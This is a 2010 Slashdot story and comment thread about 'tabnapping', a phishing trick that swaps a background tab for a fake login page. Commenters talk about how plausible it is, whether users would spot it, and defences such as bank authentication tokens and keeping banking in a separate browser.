Tabnapping Scams Around the Corner?

← Back to Stories (view on slashdot.org)

Tabnapping Scams Around the Corner?

Posted by CmdrTaco on Tuesday May 25, 2010 @12:54AM from the well-that's-not-very-nice dept.

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)

362 comments

Min score:

Reason:

Sort:

Umm... by Pojut · 2010-05-25 00:57 · Score: 3, Insightful

...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

--
Living With a Nerd
1. Re:Umm... by Anonymous Coward · 2010-05-25 00:59 · Score: 1, Insightful
  
  Yes.
  Did you really need to ask?
2. Re:Umm... by mgblst · 2010-05-25 01:01 · Score: 5, Insightful
  
  What if they have it in another tab already? Then it would work.
  And if you use this for gmail, or facebook, tabs that people always have opened, it is going to get results.
  This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.
3. Re:Umm... by Pojut · 2010-05-25 01:02 · Score: 0, Flamebait
  
  It was a rhetorical question, clod!
  
  --
  Living With a Nerd
4. Re:Umm... by Anonymous Coward · 2010-05-25 01:04 · Score: 3, Insightful
  
  I think what might be more disturbing is if the application looked at what url your other tabs are and redirected those sites to phishing sites that have copied the layout.
5. Re:Umm... by commodore64_love · 2010-05-25 01:06 · Score: 2, Insightful
  
  Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen. And I would probably fall for it when, in about an hour, I go back to see it. I'd type in my name and password without realizing a thief was watching.
  
  --
  "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
6. Re:Umm... by fuzzyfuzzyfungus · 2010-05-25 01:12 · Score: 3, Interesting
  
  P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."
  
  Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.
  
  Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.
  
  Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way(unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.
7. Re:Umm... by AlexiaDeath · 2010-05-25 01:12 · Score: 1
  
  People are dumb enough to install Latest Awesome Bling MSN smileypack + FREE TROJANS, they are dumb enough to fall for this. Banks around here do recommend opening an NEW browser window for banking and closing it after done tho as a dumb user safeguard. But they also implement proper 2 factor(what you know + what you have, a smart card with pin needed to use certificates) authentication system. Legacy 1.5 factor system is severely limited(sum you can move is ridiculously small) already and will be phased out completely soon. This or better is what the world of banking should do everywhere.
8. Re:Umm... by Pojut · 2010-05-25 01:21 · Score: 1
  
  Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen
  Ah, but like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?
  
  --
  Living With a Nerd
9. Re:Umm... by Taibhsear · 2010-05-25 01:31 · Score: 1
  
  ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?
  Having cleaned malware from at least a dozen computers/hard drives in the last couple months alone... Yes.
10. Re:Umm... by PopeRatzo · 2010-05-25 01:32 · Score: 1
  
  As long as they leave my Quick Launch bar alone.
  
  --
  You are welcome on my lawn.
11. Re:Umm... by Anonymous Coward · 2010-05-25 01:33 · Score: 0
  
  Wasn't it Abraham Lincoln that said that?
12. Re:Umm... by sglane81 · 2010-05-25 01:38 · Score: 1
  
  This does not prey on smart or dumb. This preys on how much information you can hold in your head at the same time. Miller's magic number 7. When you go beyond 7 things, you'll have to access different memory which is where the sleight of hand is at play.
  http://en.wikipedia.org/wiki/The_Magical_Number_Seven,_Plus_or_Minus_Two
  
  --
  This is the Internet. You can say "fuck" here. - AC
13. Re:Umm... by Anonymous Coward · 2010-05-25 01:41 · Score: 0
  
  What if they have it in another tab already? Then it would work.
  And if you use this for Slashdot, or Youporn, tabs that people always have opened, it is going to get results.
  This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.
  Fixed for target audience.
14. Re:Umm... by Anonymous Coward · 2010-05-25 01:42 · Score: 0
  
  but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.
  Or anyone who doesn't leave login pages open. Generally, if I have a tab open, it's because it's on a page with some actual content that I will want to go back to at a later time. If I log into something that might time me out eventually, such as my bank, then I just log in, do what I need to do, log out, and close the tab.
  Also, even if I did have 10 Firefox windows open with 20 or 30 tabs in each, when it's time to log into my bank, I'm not going to flip through all 200 to 300 tabs to see if there happens to be one sitting on the bank login page, I'm just going to open a new tab and go directly to it.
  I'm not saying that people won't fall for this. I'm just saying you don't have to be "the most paranoid user" to detect, or at least avoid, tab substitution.
15. Re:Umm... by KiloByte · 2010-05-25 01:42 · Score: 1
  
  tab-related trickery is of no particular use against SSL and cert validation,
  And how exactly SSL would help in this case? The phisher will have a legitimate cert for *.scam.com, you're not going to catch it unless you notice the URL is wrong or you run Certificate Patrol.
  
  --
  The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
16. Re:Umm... by Anonymous Coward · 2010-05-25 01:44 · Score: 0
  
  What kind of power user accepts a bank that uses only a username + password for the management of their money?
17. Re:Umm... by fuzzyfuzzyfungus · 2010-05-25 01:45 · Score: 1
  
  Depending on the market they happen to live in, any power user who wants a bank...
18. Re:Umm... by KiloByte · 2010-05-25 01:45 · Score: 1
  
  The phisher will just proxy your session to the real bank. Except, when you make that transfer, oops!, it will go to a different account. All while displaying the account you wanted on your screen.
  
  --
  The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
19. Re:Umm... by morgan_greywolf · 2010-05-25 01:47 · Score: 1
  
  As long as they leave my Quick Launch bar alone
  The Quick Launch bar in Windows is one of the easiest things to modify programmatically. Very easy to do with a bit of VBScript code, PowerShell code, or perhaps something like a NullSoft installer.
  
  --
  My blog
20. Re:Umm... by erroneus · 2010-05-25 01:48 · Score: 1
  
  Actually, in theory, they already had their bank web page up and when they weren't looking, some other code/app changes that page to a phishing page that looks like the bank's site except that it say "session timed out, please log in again." At which point, the user provides his username and password to restore his session.
  Not only do I see the average Joe falling for this sort of attack, I see *ME* falling for such an attack. I use uncommon financial and insurance companies and I have never seen a phishing email come to me pretending to be one of those... well until recently anyway. I did get one from my fairly exclusive insurance company and was pretty impressed with some levels of its sophistication. I didn't fall for it, but if it appeared in one of my tabs replacing a legitimate session, I would certainly have been fooled.
  Two things should be done to prevent this:
  1. Browsers must be coded to prevent this sort of cross-tab manipulation.
  2. All providers of sensitive information should use a key-fob type security device where the password is changed every minute or so. In this case, if the login credentials were compromised, it would quite likely be changed before anything bad could happen.
  This second option should be requested by the users. With enough requests, the institutions are bound to respond eventually. Many banks do this already with larger commercial customers leaving their private individual customers more open to exploitation. It's time I got my own SecureID type device, I think.
21. Re:Umm... by dtml-try+MyNick · 2010-05-25 01:49 · Score: 1
  
  ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?
  Short answer, yes! Long answer, yes!
  It's not even about being stupid or being dumb but the majority of people is simply clueless. It's their computer and that's safe by definition. They can't imagine that anything they see in their browser (or other program) they started up themselves could be malicious.
  They had to be taught to not click on links in their mail and you expect that very same group to know that a website can be evil too, even if it looks exactly, pixelperfect, the same as the website they usualy visit.
  Not going to happen.
  There are 2 kinds of people on this world, those who are stupid and/or gullible and those who take advantage of that
  
  --
  Life starts at the end of your comfort zone.
22. Re:Umm... by morgan_greywolf · 2010-05-25 01:53 · Score: 1
  
  This does not prey on smart or dumb. This preys on how much information you can hold in your head at the same time. Miller's magic number 7. When you go beyond 7 things, you'll have to access different memory which is where the sleight of hand is at play.
  Which is exactly why the parent pointed out that best practice for going to your bank is still to open a new browser window with no other tabs every time and closing it as soon as you're done.
  It seems dumb to me not to do so.
  
  --
  My blog
23. Re:Umm... by mcgrew · 2010-05-25 01:55 · Score: 3, Informative
  
  P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."
  No, that was Abraham Lincoln, who said "you can fool some of the people all of the time, and all of the people some of the time, but you can't fool all of the people all of the time."
  PT Barnum said "there's a sucker born every minute." And both he and Lincoln were correct.
  
  --
  Free Martian Whores!
24. Re:Umm... by SatanicPuppy · 2010-05-25 01:55 · Score: 1
  
  Actually, wrt to banking transactions, I'm cautious enough due to cross-site scripting vulnerabilities that I won't open a bank session when I have any other tabs open.
  
  --
  ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
25. Re:Umm... by commodore64_love · 2010-05-25 01:56 · Score: 1
  
  >>>most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake
  >>>
  I don't understand power users like that. Do you REALLY need to have ~50 different websites open? First off, my machine wouldn't even support it (just 1/2 gig of RAM), and second it's confusing. When I hit over 10 tabs, I start bookmarking and then closing the ones I don't really need. I can come back to them later.
  
  --
  "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
26. Re:Umm... by Pojut · 2010-05-25 01:58 · Score: 1
  
  ^This. My bank asks for the standard username and password, but then on the next screen they request your PIN. You don't type it in, though...it's completely mouse driven. So not only do they have the extra protection of needing a PIN, but it helps thwart keyloggers because you don't actually type it in.
  
  --
  Living With a Nerd
27. Re:Umm... by Anonymous Coward · 2010-05-25 01:58 · Score: 0
  
  I maintain 40 tabs open on my home page but the tabs are preset and each tab appears in specific location when I open my work session for the day. The slashdot page goes in one specific tab, the gmail in another, etc. Whenever I start a new project or investigation during the day I always open it up in a new window and once I am finished I close the window.
  I would notice immediately if a tab on my home page was open where it shouldn't be.
  Therefore I think I am immune to this type of phishing.
28. Re:Umm... by delinear · 2010-05-25 02:09 · Score: 1
  
  As far as I can tell that's exactly what the author is getting at, it's just badly summed up by saying they leave the page. What it means is, you open Facebook or something in one tab, in another tab you go to a site which has an embedded attack that reloads the Facebook tab with a phishing site that looks the same but has some "timeout, please login again" message. To the user it doesn't appear that they left the FB site at all, and likely when they "log in" the phishing site will collect their details and redirect the tab to the original page so unless the user is paying particular attention to the URLs it's completely transparent. I don't know what the feasibility of the attack is, but if it's valid you certainly wouldn't have to be stupid to fall for it.
29. Re:Umm... by delinear · 2010-05-25 02:15 · Score: 1
  
  Facebook is just a convenient example people have heard of. There are other sites where such an attack could do a lot more damage and which the user would expect to be periodically logged out of - banking for example, although if you leave a banking session open and logged in while you're working in other tabs you're probably asking for trouble anyway, but that doesn't mean it never happens.
30. Re:Umm... by Anonymous Coward · 2010-05-25 02:17 · Score: 0
  
  My brothers name is Claude, you insensitive clod!
31. Re:Umm... by TheRaven64 · 2010-05-25 02:19 · Score: 1
  
  are people really dumb enough to
  For any way that you can finish that sentence, the answer is always 'some people are, yes'. The question is how many people are dumb enough. If the end result is someone else having access to your bank account, then even a few people can make it worthwhile.
  
  --
  I am TheRaven on Soylent News
32. Re:Umm... by John+Hasler · 2010-05-25 02:23 · Score: 1
  
  > There are 2 kinds of people on this world, those who are stupid and/or
  > gullible and those who take advantage of that.
  So which are you: a fool or a criminal?
  
  --
  Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
33. Re:Umm... by TheLink · 2010-05-25 02:23 · Score: 1
  
  Use different browsers for your banking?
  
  I've got one browser for my banking, running as a different user, and it makes the "click noise" when I click on stuff (unlike my other browsers) - this browser has javascript etc disabled for everything else except the bank sites.
  
  I've got another browser for "normal stuff" running as a different user.
  
  FWIW, chrome doesn't allow me to run it as a different user on Windows.
  
  On the subject of tabnapping - one problem with chrome and the latest firefox is they make it hard to figure out where the latest "new tab" will be. No, it is not strictly adjacent to the source tab. Where the new tab is placed depends on a number of things (whether you've opened other new tabs from the source tab, or whether you've just created a new blank tab) and is rather hard to predict unless you remember the browser state. This does make it easier to fool people with tabnapped tabs.
  --
  
  Too many replies beneath your current threshold
34. Re:Umm... by Qzukk · 2010-05-25 02:25 · Score: 1
  
  I'm not sure how you'd go about changing another tab (unless there's a bug). What I think is more likely is that someone who has 20+ tabs open isn't going to remember which of those tabs was the one they logged into facebook on, so when they come across a tab that says "timed out, please log in again" they're going to assume that one was correct.
  Doesn't help that by default, tabbed browsers show [ F... ] when you've got more than three or four tabs across the top of the screen. Not that [Face...] down the side is a whole lot better...
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
35. Re:Umm... by delinear · 2010-05-25 02:26 · Score: 2, Interesting
  
  I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit pin). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc. so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.
  It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum or that expired after X payments or that could only be charged by client Y, etc and yet I have a hard time finding any of that from the major banks today.
36. Re:Umm... by natbudin · 2010-05-25 02:27 · Score: 1
  
  Cory Doctorow had an essay that speaks to this point recently: http://www.locusmag.com/Perspectives/2010/05/cory-doctorow-persistence-pays-parasites/
  TL;DR: Even if you're clueful and security-conscious most of the time, all it takes is one momentary mistake, and nobody can be perfect. Phishers and scam artists know this, and attack constantly and without cease, so that even though they fail 99.9999% of the time, those few successes yield great returns.
37. Re:Umm... by causality · 2010-05-25 02:28 · Score: 1
  
  Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19.
  I had no idea that glancing up at the address bar to check the domain of the URL immediately before actually typing login credentials qualified as "an inhuman ability to maintain state tables in your head." Is this sort of like the way janitors are called "sanitation engineers"?
  
  --
  It is a miracle that curiosity survives formal education. - Einstein
38. Re:Umm... by marcosdumay · 2010-05-25 02:34 · Score: 1
  
  Well, SSL is useless if you don't check the URL. This attack doesn't change that.
  I guess most experient users (the ones that have several tabs oppened) already know that. If not, it's time for education. I guess they also check the URL of their bank before entering passwords.
  
  --
  Rethinking email
39. Re:Umm... by Anonymous Coward · 2010-05-25 02:38 · Score: 0
  
  or getting sauced enough to face a legacy refactoring project.
  ...cries in the corner...
40. Re:Umm... by delinear · 2010-05-25 02:39 · Score: 1
  
  I tend to have to switch between, on average, four or five projects per day. Of those projects, each one has a local development environment, a system test, sometimes pre-production and a live production environment. If I'm viewing the differences between a single page on just two of the three or four environments, I already have ten tabs open - then there's webmail, issue tracking, online analytics and time management apps open in other tabs (and there'll usually be three or four issue tracking tabs open because, as I mentioned, usually switching between projects). I'm already at 15 - 20 tabs on an average day where I'm working on small, isolated projects (if anything I'm changing on any of those five projects has a site-wide impact, I'll of course have a bunch of windows open for that project so I can visually check nothing's screwed up, and this scenario is more usual for me than the one where what I'm changing affects only one page) - add in forums and information sites if I'm reading about particular technologies or tracking down bugs etc and on any given day it's not unusual for me to have 30-40 tabs open, it's just not worth the overhead of having to shut down, re-open and reload all those URLs as and when I need them. I already have several hundred bookmarks, so I don't want to pollute that pool even more with sites I might only need to use for a week and then never visit again.
41. Re:Umm... by ottothecow · 2010-05-25 02:40 · Score: 1
  
  My gmail tab did just this right before I read this article.
  I noticed the tab no longer had the "Inbox (###)" text and instead just said "GMail" as I had timed out or something.
  I'd be worried...but it was actually google's page and this happens every few days so I am used to it. Would I have checked the address bad and noticed if this had actually been a tabnapping attack? Probably not.
  
  --
  Bottles.
42. Re:Umm... by causality · 2010-05-25 02:41 · Score: 1
  
  It's not even about being stupid or being dumb but the majority of people is simply clueless.
  In isolation, not knowing any better is not stupidity; it is ignorance. Being clueless about a device or system and deciding that you're going to use it for important financial transactions anyway is the stupid part. It's a bit like getting in a car and going to the busiest, highest-speed freeway when you have no knowledge of how to drive. Not knowing how to drive doesn't make someone stupid; it means they just haven't been taught. Not knowing how to drive and doing it anyway in one of the more demanding driving environments makes someone stupid. See the difference?
  
  That's probably one of the more practical definitions of stupidity: not knowing your own limitations when you are about to exceed them, or knowing them and refusing to address them when there is a manifest need to do so.
  
  It's their computer and that's safe by definition. They can't imagine that anything they see in their browser (or other program) they started up themselves could be malicious.
  It may be their computer but it isn't their remote web site.
  
  There are 2 kinds of people on this world, those who are stupid and/or gullible and those who take advantage of that.
  Third option: there are those who want to make an honest living while at the same time learning as much as possible from the mistakes, idiocy, and bad examples of those around them. I didn't ask a fool to be easily parted from his money, but now that he has done so of his own initiative, I can read about it and understand why he was acting foolishly to make myself much less likely to follow his example.
  
  --
  It is a miracle that curiosity survives formal education. - Einstein
43. Re:Umm... by del_diablo · 2010-05-25 03:16 · Score: 1
  
  2 problems:
  How would the phingar know that the user actually changed tab? Random timeout then forced reload?
  Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how i would not spot that its forcefully reloaded and wrong?
44. Re:Umm... by noidentity · 2010-05-25 03:19 · Score: 1
  
  This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.
  
  Agreed, but I prefer spaces, since people expand tabs to varying number of spaces, most commonly 2, 3, 4, or 8.
45. Re:Umm... by Call+Me+Black+Cloud · 2010-05-25 03:20 · Score: 1
  
  I agree...I'm impressed with the cleverness. Clearly all the advancements in browser security and user safety are forcing the bad guys to be smarter, sort of an Internet version of antibiotic resistant staph.
46. Re:Umm... by Dumnezeu · 2010-05-25 03:20 · Score: 1
  
  And Google has been logging me out lately for absolutely no reason! In the past year, I've been "kicked" out of my session at least once a month, sometimes even two-three times in a single day. I'm already used to being asked to type all my passwords to iGoogle, Google Reader, Gmail, YouTube. I would NEVER think that a tab should have the right to take over another tab. Whatever the excuse is, this is just wrong!
  
  --
  Yes, it's sarcasm. Deal with it!
47. Re:Umm... by Qzukk · 2010-05-25 03:23 · Score: 1
  
  you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?
  Only if you knew Facebook never timed you out if you left it alone like just about every other website out there. Try substituting it with a bank login screen.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
48. Re:Umm... by nabsltd · 2010-05-25 03:25 · Score: 2, Informative
  
  PT Barnum said "there's a sucker born every minute."
  
  No, he didn't.
49. Re:Umm... by Anonymous Coward · 2010-05-25 03:28 · Score: 0
  
  I'm using Iron 3, which is based on Chrome 3, and it is vulnerable, and were it not for the fact that it gets the favicon wrong, I would have totally fallen for it. It is also vulnerable to the history snooping attack on the same site. Scary. It's almost like browser developers don't keep security in mind at all when they're coding. I mean... window.onblur? WTF? What kind of moron do you have to be to code support for that?
50. Re:Umm... by GlennC · 2010-05-25 03:28 · Score: 1
  
  I guess they also check the URL of their bank before entering passwords.
  Guess again.
  
  --
  Go on, citizen, stamp the vote card. R or D, your choice.
51. Re:Umm... by nabsltd · 2010-05-25 03:36 · Score: 1
  
  I don't understand power users like that. Do you REALLY need to have ~50 different websites open?
  If you have just one website with links that don't deal well with the "back" button, then you end up opening multiple tabs on the same site.
  I use a web app that fronts a pretty complex relational database, and it's not unusual that I want to switch between several related query results (e.g., the account details like address and phone, the last few orders, and maybe order details on some of those orders) very quickly.
  With 25Mbps dowload, when I'm price comparing, it's easier to use Google Shopping and open a tab for 5-6 of the "best" results and check out if they really do have the price that Google Shopping showed me in the list (i.e., not out of stock, shipping the same, etc.).
  I'm not a "50 tab" guy, but 15-20 isn't unusual.
52. Re:Umm... by Anonymous Coward · 2010-05-25 03:38 · Score: 0
  
  Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.
  I don't consider anyone using the same browser for "funny stuff" and "important stuff" a "competent power user".
  I don't even consider myself a poweruser. But I have usually only two Firefox windows open, albeit one with usually 50+ tabs. But I also have at least one other totally different browser (Opera, Links2, Dillo and Elinks provide better security than Firefox) open with all the "important" stuff. I dont like to do casual browsing on the same browser I use for matters of importance, sometimes I have to because web developers are incompetent bastards that only make pages that work with Firefox (and Internet Explorer), but when I have to do "important stuff" in Firefox, I close all other tabs before I do.
53. Re:Umm... by Hurricane78 · 2010-05-25 04:05 · Score: 1
  
  Simply make sure that you only have one tab open that you created in a empty session. TabMix Plus’s advanced session manager can make that very easy, even if you have lots of tabs open that you want to keep. (And that should be a bookmarks folder instead! Instead of a tab mess.)
  
  --
  Any sufficiently advanced intelligence is indistinguishable from stupidity.
54. Re:Umm... by Anonymous Coward · 2010-05-25 04:06 · Score: 0
  
  "This is actually incredibly brilliant."
  Not really. This is really someone taking advantage of the stupidity of the default behavior, and I'm not sure how that default behavior became acceptable by browsers in the first place.
  I'm more stunned that browsers allow scripts to access other tabs or windows within the browser. And someone is saying they have access to the browsers history? Are you kidding me? WTF?
  Worse, why is a browser so stupid that it allows a redirection or load from a different domain than the one typed in anyways? Why is http redirection on by default, and why is script redirection and loads (the browser knows it's loading, since it's updated the browser tab/window) not controllable? I'm getting sick of browsers allowing the *default* behavior to allow every damn script, and going through the preferences it's unclear what is actually being allowed or if it even works when you turn the preference off anyways.
  The browser needs to ship to be immune from the start that if it loads the most hack infested site, nothing happens. Not that if if I type in the wrong URL by one letter, and go to some porn site instead of the computer tech site I wanted, I get owned by some advertisement or background script.
  I'm starting to think we need an OpenBSD for browsers. In the meantime, I'm going to revisit my preferences in my browsers, AGAIN.
55. Re:Umm... by KevinKnSC · 2010-05-25 04:10 · Score: 1
  
  Sure, but by the time you've got users running scripts or installers locally you've already won. No need to also trick them into using a fake web page when you could just be logging their keys on the real page.
56. Re:Umm... by Hurricane78 · 2010-05-25 04:19 · Score: 1
  
  but you can't fool all of the people all of the time
  Alone, this statement is bullshit, as it has no explaining basis attached. Let’s do that:
  You can not fool all the people all the time, as long as there are gray areas between 1 and 0 in neural networks in human brains, because they cause a Gaussian distribution curve. (In this case a series of them over time.) And as long as there is always a part of the curve that is far enough outside that the amount of being fooled is closer to zero.
  Experience suggests that this is nearly always the case, but can not rule out the unlikely exception.
  Especially since “all the time” does not mean “until the end of the universe“, but just enough to reach your goal.
  Additionally since minorities can be below the power to change things, despite not being fooled, this gives you a pretty good chance to fool enough people for a long enough time, to do what you want to do. By “skating” in the center of the “wave” (sequence of curves over time).
  Also it only requires one “sucker”, similar to how it only requires one cracker to make something (software, a protected room, etc) available to everybody.
  But luckily, you can also use fooling in the opposite (good) way, to counteract the fooling. The only problem is, that that only works if you got just as little scruple and can cheat and lie just as well (in the name of good). Which unfortunately is nearly never the case.
  There you have it: Do you have the scruple to ruin a pretty good chance to fool all the people all the time?
  
  --
  Any sufficiently advanced intelligence is indistinguishable from stupidity.
57. Re:Umm... by Anonymous Coward · 2010-05-25 04:19 · Score: 0
  
  HSBC's *business* banking in the UK does have a hardware number generator dongle. I guess they're too big cheapskates to do it for personal accounts?
58. Re:Umm... by kalirion · 2010-05-25 04:21 · Score: 1
  
  The scam is if you open your bank's web page yourself, and a script in another tab changes it to the phishing site.
59. Re:Umm... by Anonymous Coward · 2010-05-25 04:25 · Score: 0
  
  PT Barnum never actually said that. It was who said that in response to something that PT Barnum did.
60. Re:Umm... by twidarkling · 2010-05-25 04:25 · Score: 1
  
  Please never submit a manuscript to a publisher then. The poor sod in charge of cleaning up your manuscript will want to fucking murder you for using spaces instead of tabs. I know from personal experience: I've been the poor sod needing to clean it up.
  
  --
  Canada: The US's more awesome sibling.
61. Re:Umm... by eugene+ts+wong · 2010-05-25 04:40 · Score: 1
  
  You are right. Many web sites use very cryptic URLs, so it's hard to check.
  
  --
  testing out my trending skills
62. Re:Umm... by Qzukk · 2010-05-25 04:48 · Score: 2, Interesting
  
  user actually changed tab?
  window.onblur()
  Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how i would not spot that its forcefully reloaded and wrong?
  Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.
  I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
63. Re:Umm... by maroonhat · 2010-05-25 04:54 · Score: 1
  
  and if you couple this attack with the slightly older "make the address bar show a slightly wrong thing" attack...
  you know, the PayPal.com vs PayPaI.com (one's an L one's an I, can you tell with the default font?)...adjusted for font collisions, or making use of the way a browser falls back on installed fonts when you try and show a different script style...
  This could be very bad...
  
  --
  The more I learn about Windows the more I am surprised it runs at all
64. Re:Umm... by Anonymous Coward · 2010-05-25 05:01 · Score: 0
  
  Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19.
  The easy solution: Use a completely different browser for your banking. Banking & only banking is done with that browser.
65. Re:Umm... by TheThiefMaster · 2010-05-25 05:40 · Score: 1
  
  Why not leave HSBC? Barclays' online banking uses a card reader that generates a unique code every time, and requires your bank card and pin. They used to use "enter your online pin (different from your card pin), and pick the 3rd, 4th, and 11th characters of your secret phrase off these dropdowns", but they decided come up with an actually modern security system. Now, logging into online banking isn't much more hassle than using a cash machine, but still very secure.
  Setting up money transfers and recurring payments through the online banking also requires authentication from the card reader device (you have to put the amount into the device too), so even if someone manages to get into your account somehow they still can't steal your money without your card and pin (with which they could just use a cash machine anyway).
  It really is hard to fault.
66. Re:Umm... by Anonymous Coward · 2010-05-25 05:48 · Score: 0
  
  What idiot thought it was a good idea to design a web browser so that this was possible?
67. Re:Umm... by John+Hasler · 2010-05-25 05:55 · Score: 1
  
  > ...nobody can be perfect.
  It doesn't matter if someone can be perfect as long as many people are not.
  
  --
  Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
68. Re:Umm... by Anonymous Coward · 2010-05-25 06:00 · Score: 0
  
  Will this method work if you browse all the time in Private mode because isn't it suppose to be not remembering your history?
69. Re:Umm... by mcgrew · 2010-05-25 06:21 · Score: 1
  
  I stand corrected. That's what I love about this place, sometimes I learn stuff.
  
  --
  Free Martian Whores!
70. Re:Umm... by Golddess · 2010-05-25 06:24 · Score: 1
  
  It could be that this won't work when a page from Site B tries to load in a window/tab opened by a page from Site A, but there's this thing called a "target" that can be specified in HTML forms. By clicking a link that utilizes a "target", a new window/tab opens up, and any other link that references the same "target" will also open in that same window/tab.
  
  --
  "I'm not sure I like the fugnutish tone you used in your post!" -RogL (608926)-
71. Re:Umm... by stonewallred · 2010-05-25 07:02 · Score: 1
  
  My question, as a non-geek/tech guy, is that if it is a site I use all the time, won't the clue be that my stuff ain't autofilled? When I go to any site on my home computer, I am always logged into common sites, either skipping the log in page or in some cases my data is filled in at the log in page. So will this fool the browser into thinking it is correct page and it throw my user/pw into the fields, or will it recognize it. And I use FF, noscript and ABP.
72. Re:Umm... by Anonymous Coward · 2010-05-25 07:37 · Score: 0
  
  People should just get into the habit of looking at the address bar before typing passwords into any page.
73. Re:Umm... by Anonymous Coward · 2010-05-25 07:53 · Score: 0
  
  That's the font makers' fault for being too lazy to differentiate the characters. The crossbars on the letter I are not serifs. Unicode probably has at least 50 other vertical bar characters to sneak past us.
74. Re:Umm... by Anonymous Coward · 2010-05-25 10:15 · Score: 0
  
  Guess I'm a "most paranoid user." I close Firefox, thereby deleting all my history, cookies, etc. both before and after visiting my bank's site.
75. Re:Umm... by cshay · 2010-05-25 10:40 · Score: 1
  
  I don't think it is helpful to tell people to change their browsing habits (I have 150 tabs open right now, many from the same sites and I like it like that). People use software in many different ways that suit them. Better to just fix this problem in the browser.
76. Re:Umm... by Pentium100 · 2010-05-25 14:22 · Score: 1
  
  Both of my banks have two level security. One is they give you a user ID, semi-permanent password (you have to change it sometimes) and a card with multiple passwords. When you log in, you have to type you user ID, password and then they ask for a specific password from the card (type password #5). When you want to do a wire transfer to an account that belongs to someone else you have to type in a password from the card. So, the attacker has to know at least 3 passwords to be able to do the transfer (main one, two from the card and hope that the server asks for those two).
  If you want, you can buy a key generator for ~$7 and no longer use the card. In this case you type your password to the generator and the generated one time key in place of your password at the bank.
77. Re:Umm... by Anonymous Coward · 2010-05-25 19:53 · Score: 0
  
